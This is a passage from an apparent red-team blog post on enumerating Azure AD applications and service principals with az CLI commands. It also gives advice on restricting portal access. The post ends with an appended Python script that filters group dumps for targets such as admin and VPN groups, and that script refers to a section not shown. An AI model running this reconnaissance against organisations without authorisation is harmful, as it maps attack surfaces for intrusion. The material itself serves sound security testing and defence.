Another nice feature Microsoft provides is the ability to register applications that use SSO/ADFS or integrate with other technologies. A lot of companies utilize this for internal applications.
The reason this is nice for red teamers is that the metadata associated with the applications can provide deeper insight into attack surfaces that may not have been discovered during reconnaissance, like URLs.

All Applications

az ad app list --output=table --query='[].{Name:displayName,URL:homepage}'

Specific Application

In the screenshot below, you can see we obtained the URL for the Splunk instance by examining the metadata associated with the registered application in Azure.

az ad app list --output=json --identifier-uri='<uri>'

All Service Principals

az ad sp list --output=table --query='[].{Name:displayName,Enabled:accountEnabled,URL:homepage,Publisher:publisherName,MetadataURL:samlMetadataUrl}'

Specific Service Principal

az ad sp list --output=table --display-name='<display name>'

Advanced Filtering with JMESPath

You might have noticed in the above examples that I try to limit the amount of data that is returned. This is mainly because I try to grab just what I need instead of everything. The way AZ CLI handles this is with the --query flag, which takes a JMESPath query. This is a standard query language for interacting with JSON. I did notice a few bugs in AZ CLI when combining the query flag with the 'show' built-in functions. The other thing to note is that the default response format is JSON, which means that if you plan on using a query filter, you need to specify the correct case-sensitive naming conventions. There is a bit of inconsistency in the field names between the different output formats: the table format might capitalize a name where the JSON format has it lowercase.

Disable Access to Azure Portal

I spent a bit of time trying to make sense of what to disable, how to prevent access, how to limit, what to monitor, and I even reached out to people on Twitter (thanks Josh Rickard!). I appreciate all the people who reached out to help make sense of this madness. I suppose I should learn the Microsoft ecosystem more, in hopes of offering better suggestions. Until then, I offer you a way to disable Azure Portal access for users. I haven't tested this and can't be sure whether it also covers AZ CLI, Azure RM Powershell, and the Microsoft Graph API, but it's definitely a start.

Step 1) Log in to Azure using a Global Administrator account: https://portal.azure.com
Step 2) On the left panel, choose 'Azure Active Directory'
Step 3) Select 'Users Settings'
Step 4) Select 'Restrict access to Azure AD administration portal'

An alternative is to look into Conditional Access Policies: https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview

Coming Soon!

There are a number of different tools out there for testing AWS environments, and even new tools that have come out recently for capturing cloud credentials, like SharpCloud. Cloud environments seem to be a commonly overlooked attack surface. I will be releasing a (currently private) red team framework for interacting with cloud environments, called CloudBurst. It's a pluggable framework that gives users the ability to interact with different cloud providers to capture, compromise, and exfil data.

Source: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
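As promised in the "All Groups" section above, here is a minimal post-processing sketch for the group dump: it runs the same az ad group list command shown earlier and flags groups whose name or description matches interesting keywords. Only the az command and its --output/--query flags come from the post; the subprocess wrapper and keyword list are illustrative, and it assumes az is installed and already logged in:

import json
import subprocess

# Keywords worth hunting for in group names/descriptions (from the post).
KEYWORDS = ["admin", "vpn", "finance", "amazon", "azure", "oracle", "vdi", "developer"]

# The same command used in the "All Groups" section above.
cmd = [
    "az", "ad", "group", "list", "--output=json",
    "--query=[].{Group:displayName,Description:description}",
]
groups = json.loads(subprocess.check_output(cmd))

for g in groups:
    text = f"{g.get('Group') or ''} {g.get('Description') or ''}".lower()
    if any(k in text for k in KEYWORDS):
        print(f"[+] {g.get('Group')}: {g.get('Description')}")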